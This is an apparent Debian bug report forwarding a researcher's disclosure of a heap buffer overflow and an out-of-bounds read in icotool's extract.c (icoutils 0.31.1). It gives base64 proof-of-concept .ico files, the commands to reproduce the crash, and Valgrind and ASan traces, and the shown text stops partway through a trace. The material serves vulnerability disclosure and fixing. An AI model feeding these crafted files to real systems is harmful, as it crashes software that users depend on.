Package: icoutils
Version: 0.31.1
---------- Forwarded message ----------
From: op7ic \x00 <op7...@gmail.com>
Date: Wed, Feb 1, 2017 at 11:28 AM
Subject: Buffer Overflows and OOBs in icotool
To: frank.rich...@gmail.com, os...@osk.mine.nu
Please see attached reports.
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz
Description:
A buffer overflow was observed in "extract_icons" function in "extract.c"
source file. This issue can be triggered by processing a corrupted ico file and
will result in icotool crash. To replicate this issue use the attached sample
below and execute the following command:
PoC file:
AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAHAACAAP////QABAAAAAAAAAQAbwDY+v///wAAAAAA
AAD//3X//xYAAAAoAAAABgABACAAAAD/AEwAAAAAAAAAAAAjAAQAAAAAAAAAgHBwAADA/wD///8A
AAAAAAAAAAAAAAAjMhEAAAAAAAAAAAAREREREREREREREREREREAAQAAAAAAAAAAACMyERERERER
EREREREAAAAAAAAAAAAAACMYERERERERERERERH0AAAAAAAAAPb//yIyEREREREREREREREAAAB/
AAAAAAAAACMyEREREREREREREREREREREREAAAAAAAAAAAD7ACMyAAAAAAAAAAAAAAARERERERER
ERERESMREREREREjMgAAAAAAAAAAAAAAERESERERAAAAAAAAAAAREREsIBERERERf////wAAAAAA
AAAAAAARERERERERERERHSMyAAAAAAAAAAAAAAARERERERERERERESMyAAAAEAAAAAAAAAARERER
ERERERERESMyAAAAAAAAAAAAAAARERERERERERERESMyEAAAAAAAAAAAAAARERERERERERERESMy
AAAAAAAAAAAAAAAREREREREREREREAAyAAAAAAAAAAAAAAARERERERF//xEAAAAAAAAAERERERER
EREREREjMgAAAAAAAAAAAAAAIiIiIiIiIiIiIiIiIiIiEREAACMzMzMzMzMzMzMzMzMzMzMzMzMz
MzMzMzMcAP////8AABEREREREREREREAMgAAAAAAAACAAAAAAAARERERgAAAAAABAACAAAAAAAEA
AIAAAAAAAQAAgAAAAAABAAD+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+av9uev9/bm5ubm5ubv0iMgAQwP8A////AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA7QAAAAAAAAAAAAAQAAAAAAAAAAAAAAAz/v7+/v7+/v7+AACAAAD+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7n/v7+/v7+/v7+
/v7+H/7+/v3+/v7+6/7+/v7+Buf+/v7+/n/////+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+
/v7+Cf/+/v7+/v7k/v7+H/7+/v7+/v7++v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+
HAACEREREREREREjMgAAIzMzMzMzMzMzMzMsMzMzMzMzMzMzGzMzMwZ//////wAAgAAAAAABAACA
AAAAAAEAAP7+AP/o/v7+/v7+/v7+/hyBAAAAAAEAAICUlJSUlJSUlJSUlJSUlJSUlJSUlP7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7o/v7+/v7+/v7+/v7+/v7+/t/+/v7+/v7+/v7+/v7+/v7+/v7+K/7+
/v7+/v7+/v7+/v7+ERERERERERER/v7+/v7+/v7+/t7+/v7+/v7+/v7+/v7+/v7+/gD+/v7+/v7+
/v7+/v7+/v7+/v7+AAAAAQAA/v4AgP7+/v7+/v7+/v7+HIEAAAAAAQAAgJSUlJSUlJSUlJSUlJSU
lJSUlJSU/v7+/v7+/v7+/v7+/v7+/v7+/v7+/uj+/v7+/v7+/v7+/v7+/v7+3/7+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+3v7+/v7+/v7+/v7+/v7+
/v7+AP7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7q/v7+/v7+/v7+/v7+/v7+/v7+/v7u/v7+/v7+/v7+/v4S//4zMzMz
MzMzMzMzMzMzMxwA/////wAAEREREREREREREQAyAAAAAAAAAIAAAAAAABERERGAAAAAAAEAAIAA
AAAAAQAAgAAAAAABAACAAAAAAAEAAP7+/v7+/v7+/v7+/v7+/v4jMhEAAAAAAAAAAAARERERERER
EREREREREREAAQAAAAAAAAAAACMyEREREREREREREREAAAAAAAAAAAAAACMyERERERERERERERH0
AAAAAAAAAPb//yIyEREREREREREREREAAAB/AAAAAAAAACMyEREREREREREREREREREREREAAAAA
AAAAAAD7ACMyAAAAAAAAAAAAAAARERERERERERERESMREREREREjMgAAAAAAAAAAAAAAERESERER
AAAAAAAAAAAREREsIBERERERf////wAAAAAAAAAAAAARERERERERERERHSMyAAAAAAAAAAAAAAAR
ERERERERERERESMyAAAAEAAAAAAAAAARERERERERERERESMyAAAAAAAAAAAAAAARERERERERERER
ESMyEAAAAAAAAAAAAAARERERERERERERESMyAAAAAAAAAAAAAAAREREREREREREREAAyAAAAAAAA
AAAAAAARERERERF//xEAAAAAAAAAEREREREREREREREjMgAAAAAAAAAAAAAAIiIiIiIiIiIiIiIi
IiIiEREAACMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMcAP////8AABEREREREREREREAMgAAAAAA
AACAAAAAAAARERERgAAAAAABAACAAAAAAAEAAIAAAAAAAQAAgAAAAAABAAD+/v7+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+av9uev9/bm5ubm5ubv0i
MgAQwP8A////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7QAAAAAAAAAAAAAQAAAAAAAA
AAAAAAAz/v7+/v7+/v7+AACAAAD+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7n/v7+/v7+/v7+/v7+H/7+/v3+/v7+6/7+/v7+Buf+/v7+/n/////+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+Cf/+/v7+/v7k/v7+H/7+/v7+/v7++v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7n/v7+/v7+/v7+/v7+H/7+/v3+/v7+
6/7+/v7+Buf+/v7+/n/////+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+Cf/+/v7+/v7k
/v7+H/7+/v7+/v7++v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+HAACEREREREREREj
MgAAIzMzMzMzMzMzMzMsMzMzMzMzMzMzGzMzMwZ//////wAAgAAAAAABAACAAAAAAAEAAP7+AP/o
/v7+/v7+/v7+/hyBAAAAAAEAAICUlJSUlJSUlJSUlJSUlJSUlJSUlP7+/v7+/v7+/v7+/v7+/v7+
/v7+/v7o/v7+/v7+/v7+/v7+/v7+/t/+/v7+/v7+/v7+/v7+/v7+/v7+K/7+/v7+/v7+/v7+/v7+
ERERERERERER/v7+/v7+/v7+/t7+/v7+/v7+/v7+/v7+/v7+/gD+/v6FhYWFhYWFhYWFhYWFhYWF
hYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhf+FhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWF
hYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWF
hYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhf7+/v7+/v7+/v7+/v7+/v4AAAAB
AAD+/gD//v7+/v7+/v7+/v4cgQAAAAABAOR/lJSUlJSUlJSUlJSUlJSUlJSUlJT+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+6P7+/v7+/v7+/v7+/v7+/v7f/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/uL+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7e/v7c/v7+/v7+/v7+/v7+/v4A/v7+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+6P7+/v7+/v7+/v7+
/v7+/v7f/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+2/7+/v7+/v7+/v7+/v7+
/v7e/v7+/v7+/v7+/v7+/v7+/v4A/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/ur+/v7+/v7+/v7+/v7+/v7+/v7+/u7+
/v7+/v7+/v7+/hL//v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+6P7+/v7+/v7+/v7+/v7+/v7+/uv+/v7+/v7m
/v7+/v5//////v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+AAAA//7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/vd+/hwRERERERERERERIzIAACMzMzMz
MzMzMzMzLDMzMzMzMzMzMyAzMzMAf/////8AAIAAAAAAAQAAgAD//wABAAD+/v7+/v7+/v7+/v7+
/v4cgQAAAAABAACAAAAAAAEAAH/8AAABAACAAP7+/v7+/v4AAAABAACAAAAAAAEAAIAAAAAAAQAA
gAAAAAAbAACAAAAAAAEAAIAImQAAAQAAgAAAAAABAACAAAAAAAEAAIAAAIAAAAAAAQAAgAAAAAAB
AAAUAADo/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/vb+/v7+/v7+/v7+/v7+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+AAACAP7+/v7+/v7+av9uev9/bm6E
bm5ubhGAQAAAwP8A////AADs////AAAAAAAAAAAAAAAAAAAAAAAA/v7+/v7+/v7+/v7+/v7+/v7+
/v7+/v7+/v7+/v7+/v7q/v7+/v7+/v7+/v7+/v7+/v7+/jMsMzMzMzMzMzMz/v6Xl5eXl5eXl5eX
l5eXl5eXl5eXlwAAAAGXl5eXlwCAl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl/7+
/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v5A/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+
3v7+/v4=
Repeat-By:
echo <above base64> > PoC.ico.b64
base64 -d PoC.ico.b64 > PoC.ico
/home/ico-target/icoutils-0.31.1/icotool/icotool -l PoC.ico
Valgrind Output:
valgrind /home/ico-target/icoutils-clean/icotool/icotool -l /tmp/PoC.ico
==5033== Memcheck, a memory error detector
==5033== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==5033== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==5033== Command: /home/ico-target/icoutils-clean/icotool/icotool -l
/tmp/PoC.ico
==5033==
/tmp/PoC.ico: x_pels_per_meter field in bitmap should be zero
/tmp/PoC.ico: y_pels_per_meter field in bitmap should be zero
/tmp/PoC.ico: clr_important field in bitmap should be zero
/tmp/PoC.ico: planes field in bitmap should be one
==5033== Invalid write of size 1
==5033== at 0x4041A4: extract_icons (extract.c:320)
==5033== by 0x402420: main (main.c:323)
==5033== Address 0x5926d9c is 0 bytes after a block of size 28 alloc'd
==5033== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033== by 0x4090C8: xmalloc (xmalloc.c:41)
==5033== by 0x404512: extract_icons (extract.c:304)
==5033== by 0x402420: main (main.c:323)
==5033==
==5033== Invalid write of size 1
==5033== at 0x4041B3: extract_icons (extract.c:321)
==5033== by 0x402420: main (main.c:323)
==5033== Address 0x5926d9d is 1 bytes after a block of size 28 alloc'd
==5033== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033== by 0x4090C8: xmalloc (xmalloc.c:41)
==5033== by 0x404512: extract_icons (extract.c:304)
==5033== by 0x402420: main (main.c:323)
==5033==
==5033== Invalid write of size 1
==5033== at 0x4041BB: extract_icons (extract.c:322)
==5033== by 0x402420: main (main.c:323)
==5033== Address 0x5926d9e is 2 bytes after a block of size 28 alloc'd
==5033== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033== by 0x4090C8: xmalloc (xmalloc.c:41)
==5033== by 0x404512: extract_icons (extract.c:304)
==5033== by 0x402420: main (main.c:323)
==5033==
==5033== Invalid write of size 1
==5033== at 0x4041F0: extract_icons (extract.c:331)
==5033== by 0x402420: main (main.c:323)
==5033== Address 0x5926d9f is 3 bytes after a block of size 28 alloc'd
==5033== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033== by 0x4090C8: xmalloc (xmalloc.c:41)
==5033== by 0x404512: extract_icons (extract.c:304)
==5033== by 0x402420: main (main.c:323)
==5033==
==5033== Invalid read of size 1
==5033== at 0x40382A: simple_vec (extract.c:425)
==5033== by 0x40420C: extract_icons (extract.c:313)
==5033== by 0x402420: main (main.c:323)
==5033== Address 0x5926b00 is 0 bytes after a block of size 512 alloc'd
==5033== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033== by 0x4090C8: xmalloc (xmalloc.c:41)
==5033== by 0x403EDF: extract_icons (extract.c:250)
==5033== by 0x402420: main (main.c:323)
==5033==
==5033== Invalid read of size 1
==5033== at 0x4037E9: simple_vec (extract.c:421)
==5033== by 0x4041DB: extract_icons (extract.c:331)
==5033== by 0x402420: main (main.c:323)
==5033== Address 0x5926d40 is 0 bytes after a block of size 512 alloc'd
==5033== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==5033== by 0x4090C8: xmalloc (xmalloc.c:41)
==5033== by 0x403F0E: extract_icons (extract.c:254)
==5033== by 0x402420: main (main.c:323)
==5033==
==5033==
==5033== Process terminating with default action of signal 11 (SIGSEGV)
==5033== Bad permissions for mapped region at address 0x5D23000
==5033== at 0x4041A4: extract_icons (extract.c:320)
==5033== by 0x402420: main (main.c:323)
==5033==
==5033== HEAP SUMMARY:
==5033== in use at exit: 1,819 bytes in 8 blocks
==5033== total heap usage: 57 allocs, 49 frees, 11,791 bytes allocated
==5033==
==5033== LEAK SUMMARY:
==5033== definitely lost: 28 bytes in 1 blocks
==5033== indirectly lost: 0 bytes in 0 blocks
==5033== possibly lost: 0 bytes in 0 blocks
==5033== still reachable: 1,791 bytes in 7 blocks
==5033== suppressed: 0 bytes in 0 blocks
==5033== Rerun with --leak-check=full to see details of leaked memory
==5033==
==5033== For counts of detected and suppressed errors, rerun with: -v
==5033== ERROR SUMMARY: 6261389 errors from 6 contexts (suppressed: 0 from 0)
Segmentation fault
ASAN Report (needs to compiled with -fsanitize=address):
==4989==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000efcc
at pc 0x4109cc bp 0x76e1b07ad8f0 sp 0x76e1b07ad8e8
WRITE of size 1 at 0x60300000efcc thread T0
#0 0x4109cb in extract_icons
/home/ico-target/icoutils-0.31.1/icotool/extract.c:320
#1 0x403efd in main /home/ico-target/icoutils-0.31.1/icotool/main.c:323
#2 0x67062c940b44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#3 0x404e15 (/home/ico-target/icoutils-0.31.1/icotool/icotool+0x404e15)
0x60300000efcc is located 0 bytes to the right of 28-byte region
[0x60300000efb0,0x60300000efcc)
allocated by thread T0 here:
#0 0x67062d46173f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x43c2e0 in xmalloc /home/ico-target/icoutils-0.31.1/lib/xmalloc.c:41
SUMMARY: AddressSanitizer: heap-buffer-overflow
/home/ico-target/icoutils-0.31.1/icotool/extract.c:320 extract_icons
Shadow bytes around the buggy address:
0x0c067fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c067fff9df0: fa fa fa fa fa fa 00 00 00[04]fa fa 00 00 00 fa
0x0c067fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==4989==ABORTING
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.1
Release Status: release
Author: Jerzy Kramarz
Description:
An out-of-bound read leading to buffer overflow was observed in "simple_vec"
function in "extract.c" source file. This issue can be triggered by processing
a corrupted ico file and will result in icotool crash. To replicate this issue
use the attached sample below and execute the following command:
PoC file:
AAABAAQAEBAQAAEABAAoAQAARgAAABgYEAABAH////8AAG4BAAAgIBAAAQAEAOgCAABWAwAAMDAQ
AAEABABoBgAAPgYAAGgAAAAQAACAIAAAAAEABAAAAAAAwAAAAAAAAAAAAACfAAAAAAAAAACAcHAA
AMD/AP///wAAAAAAABAAAAAAAP////sAAABAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAMzMzMzMzMzMyIiIiIiIiIzIREREAAAAjMhEREQAAACMyERERAAAAIzIREREAAAAjMhERAAAR
LxEjMgAAABERESMyAAAA8RERIzIiIiIiIiIjMzMzMzMzMzP//wAAgAEAAIABAACAAQAAgAEAAIAB
AACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAAD//wAAKAAAABgAAAAwGgAAAQAE
ABEAAAAAACMyEREREREAAAAzMzMzMzMzMzIiIiIiIiIjMhEREREAAAAAACMyEREREREAAAAAACMA
AAAAgAEAAAAAAAAAAAAAAAAAAAAAAAC3cHAAAMD/AQAAGgAAAAAAAAAAAAAAAAAAAAABAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMzMzMzMzMzMzMzMzMiIiIiIiIiIiIiIBAP//
EAAoAAAAIAAAAEAAAAABAAQAAAAAAIACAAAAAAAAAAAjAQAAgAEAAIABAAD//xERETP/////gAAA
ARERAAAAAAAjMhERERERAAAAMzMzMzMzMzMyIiIiIiIiIzIRERERAAAAAAAjMhERERERAAAAAAAj
MhERURERAAAAAAAjMgAAAAAAEREREREjMgAAAAAAEREREREjMv/0AAAAEREREREjMgAAAAAAERER
EREjMgAAAAAAEREREREjMgAAAAAAEREREREjBgYG8wYBAIAAAQCAAAEAgAABAIAAAQCAAAEAgAAB
AIAAAQB/7wEAgAABAIAAAQCAAAEAgAABAIAAAQCAAAEAgAABAAABAACAAAEAgAABAIAAAQCAAAEA
gAABAP///wAoAAAAEQAAACMAgAABAAQAAAAAAIACAAAAAAAAAAAAAAAAAAAAAAAAgHAAERERERER
ESMyAAAAAAAAABEREREREREjMgAAAAAAAAARERERERERIzIAgAAAAAAAERERERERf////wAAAAAA
ABEREREREREjMgAAAAAAAAARERERERERIzIAAAAAAAAAERERERERESMyAAAyIiIiIiIiIiIiIiIi
IiIjMzMzMzMzMzO4MzNNMzMzM/////+AAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAA
AAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAA
AYAAAAGAAAABgAAAAYAAAAGAAAAB/////zIAAAAwAAAAYAAAAAEABAAAAAAAAAYAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAIiIiIiIjMhERERERERERERERAAAAAAAAAAAAAAAjMhEREREAAAGA
AAABgAAAAf////8oABERERERERERERERIzIAAAAAAAAAAAAAABERERERAAAwAAAAYAAAAAEABAAA
AAAAAAYAAH////8AAAAAAAAAAAAAAACAcHAAAMD/AP///wD////mAGQAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMiIi
IiIiIiIiIiIiIiIiIiIiIiIiIiIjMhERERERERERERERAAAAAAAAAADQAAAjMhERERERERERERER
AAAAAAAAAAAAAAAjMgDBAAARERERERERIzIAAAAAAAAAERERERERESMyAAAAAAAAABEREREREREj
MiIiIiIiIiIiIiIiIiIiIzMzMzMzMzMzMzMzMzMzMzP/////gAAAAYAAAAGAAAD2fwAAAYAAAAGA
AAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAA
AAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAAB/////zIAAAAwAAAAYAAA
AAEREREACwAAAAAAAAAAACMyEREREREREREREREREREREREREQAAAAAAAAAAAAAAIzIRERERERER
EREREQAAAAAAAAAAAAAAIzIREREREREREREREQAAAAAAAAAAAAAAIzIREREREREREREREQAAAAAA
AAAAAAAAIzIREREREREREREREQAAAAAAAAAAAAAAIzIREREREREREREREQAAAAAAAAAAAAAAIzIR
EREREREREREREQAAAAAAAAAAAAAAIzIREREREREREREREQAAAAAAAAAAAAAAIzIRERERERERERER
EQAAAAAAAAAAAAAAIzIAAAAAAADv////ABERERERERERERERIzIAAAAAAAAAAAAAABERERERERER
ERERIzIAAAAAAAAAAAAAABEREREREREZERERIzIA3f///wAAAAAAABERERERERERERERIzIAAAAA
AAAAAAAAABERERERERERERERIzIAAAAAAAAAAAAAABERERERERERERERIzIAAAAAAAAAAAAAABER
ERERERERERERIzIAAAAAAAAAAAAAABERERERERERERERIzIAAAAAAAAAAAAAABERERERERGAAAEA
gAABAIAAAQCAAAEAgAABAIARERERIzIAAAAAAAAAAAAAABERERERERERERERIzIAAAAAAAAAEQER
EREREREREREjMgAAAAAAAAAAAAAAEREREREREREREREjMgAAAAAAAAAAAAAAEREREREREREREREj
MgAAABUAAAAAAAAAEREREREREREREREjMgAAAAAAAAAAAAAAEREREREREREREREjMgAAAAAAAAAA
AAAAEREREREREREREREjMgAAAAAAAAAAAAAAEREgEREREREREREjMiIiIiIiIiIiIiIiIiIiIiIi
IiIiIiIjMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMz////////AACAAAAAAAEAAIAAAAAAAQAAgAAA
AAABAACAAAAAAAEAAIAAAAAAAQAAgAAAAAABAACAAAAAAAEAAIAAAAAAAQAAgAAAAAABAACAAAAA
AAEAAIAAAAAAAQAAgAAAAAABAACAAAAAAAEAAIAAAAAAAQAAgAAAAAABAACAAAAAAAEAAIAAAAAA
AQAAgAAAAAABAACAAAAAAAEAAIAAAAAAAQAAgAAAAAABAACAAAAAAAEAAIAAAAAAEQAAgAAAAAAB
AACAAAAAAAEAAIAAAAAAAQAAgAAAAAABAACAAAAAAAEAAIAAAAAAAQAAgAAAAAABAACAAAAAAAEA
AIAAAQCAAAEAgAABAIAAAQCAAAEAgAABAIAAAQCAAAEAgAABAIAAAQCAAAEAgAABAAABAACAAAEA
gCABAIAAAQCAAAEAgAABAP///wAoAAAAEQAAAIAAAAABAAQAAAAAAIACAAAAAAAAAAAAAAAAAAAA
AAAAgHAAERERERERESMyAAAAAAAAABEREREREREjMgAAAAAAAAARERERERERIzIAgAAAAAAAERER
ERERESMyAAAAAAAAABEREREREREjMgAAAAAAAAARERERERERIzIAAAAAAAAAERERERERESMyAAAy
IiIiIiIiIiIiIiIiIiIjMzMzMzMzMzO4MzNNMzMzM/////+AAAABgAAAAYAAAAGAAAABgAAAAYAA
AAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAA
AYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAH/////KAARERERERERERER
ESMyAAAAAAAAAAAAAAAREREREQAAMAAAAGAAAAABAAQAAAAAAAAGAAB/////AAAAAAAAAAAAAAAA
gHBwAADA/wD///8AAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAADMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzIiIiIiIoAAAAGAAAABgAAAAYAAAAGAAAAB
gAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAiIiIiIiIiIiIiIiIiIiIi
IiMyERERERER9hEREREAAAAAAAAAANAAACMyERERERERERERkREAAAAAAAAAAAAAACMyAAAAABER
EREREREjMgAAAAAAAAARERERERERIzIAAPUAAAAAEREREVQRESMyIiIiIiIiIiIiIiIiIiIjMzMz
MzMzMzMzMzMzMzMzM/////+AAAABgAAAAYAAAPZ/AAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAAB
gAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGAAAABgAAAAYAAAAGA
AAABgAAAAYAAAAGAAAABgAAAAYAAAAH/////MgAAADAAAABgAAAAgAAAAAABAACAAAAAAAEAAIAA
AAAAAQAAgAAAAAABAACAAAAAAAEAAIAAAAAAAQAAgAAAAAABAACA/f//EAEAAIAAAAAAAQAAgAAA
AAABAACAKwAAAA==
Repeat-By:
echo <above base64> > PoC.ico.b64
base64 -d PoC.ico.b64 > PoC.ico
/home/ico-target/icoutils-0.31.1/icotool/icotool -l PoC.ico
Valgrind Output:
valgrind /home/ico-target/icoutils-clean/icotool/icotool -l /tmp/PoC.ico
==4859== Memcheck, a memory error detector
==4859== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==4859== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==4859== Command: /home/ico-target/icoutils-clean/icotool/icotool -l
/tmp/PoC.ico
==4859==
/tmp/PoC.ico: y_pels_per_meter field in bitmap should be zero
/tmp/PoC.ico: skipping 64 bytes of extended bitmap header
/tmp/PoC.ico: incorrect total size of bitmap (296 specified; 360 real)
==4859== Invalid read of size 1
==4859== at 0x40382A: simple_vec (extract.c:425)
==4859== by 0x40420C: extract_icons (extract.c:313)
==4859== by 0x402420: main (main.c:323)
==4859== Address 0x5926730 is 0 bytes after a block of size 128 alloc'd
==4859== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859== by 0x4090C8: xmalloc (xmalloc.c:41)
==4859== by 0x403EDF: extract_icons (extract.c:250)
==4859== by 0x402420: main (main.c:323)
==4859==
==4859== Invalid write of size 1
==4859== at 0x4041A4: extract_icons (extract.c:320)
==4859== by 0x402420: main (main.c:323)
==4859== Address 0x5926830 is 0 bytes after a block of size 64 alloc'd
==4859== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859== by 0x4090C8: xmalloc (xmalloc.c:41)
==4859== by 0x404512: extract_icons (extract.c:304)
==4859== by 0x402420: main (main.c:323)
==4859==
==4859== Invalid write of size 1
==4859== at 0x4041B3: extract_icons (extract.c:321)
==4859== by 0x402420: main (main.c:323)
==4859== Address 0x5926831 is 1 bytes after a block of size 64 alloc'd
==4859== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859== by 0x4090C8: xmalloc (xmalloc.c:41)
==4859== by 0x404512: extract_icons (extract.c:304)
==4859== by 0x402420: main (main.c:323)
==4859==
==4859== Invalid write of size 1
==4859== at 0x4041BB: extract_icons (extract.c:322)
==4859== by 0x402420: main (main.c:323)
==4859== Address 0x5926832 is 2 bytes after a block of size 64 alloc'd
==4859== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859== by 0x4090C8: xmalloc (xmalloc.c:41)
==4859== by 0x404512: extract_icons (extract.c:304)
==4859== by 0x402420: main (main.c:323)
==4859==
==4859== Invalid write of size 1
==4859== at 0x4041F0: extract_icons (extract.c:331)
==4859== by 0x402420: main (main.c:323)
==4859== Address 0x5926833 is 3 bytes after a block of size 64 alloc'd
==4859== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859== by 0x4090C8: xmalloc (xmalloc.c:41)
==4859== by 0x404512: extract_icons (extract.c:304)
==4859== by 0x402420: main (main.c:323)
==4859==
==4859== Invalid read of size 1
==4859== at 0x4037E9: simple_vec (extract.c:421)
==4859== by 0x4041DB: extract_icons (extract.c:331)
==4859== by 0x402420: main (main.c:323)
==4859== Address 0x59267b0 is 0 bytes after a block of size 64 alloc'd
==4859== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==4859== by 0x4090C8: xmalloc (xmalloc.c:41)
==4859== by 0x403F0E: extract_icons (extract.c:254)
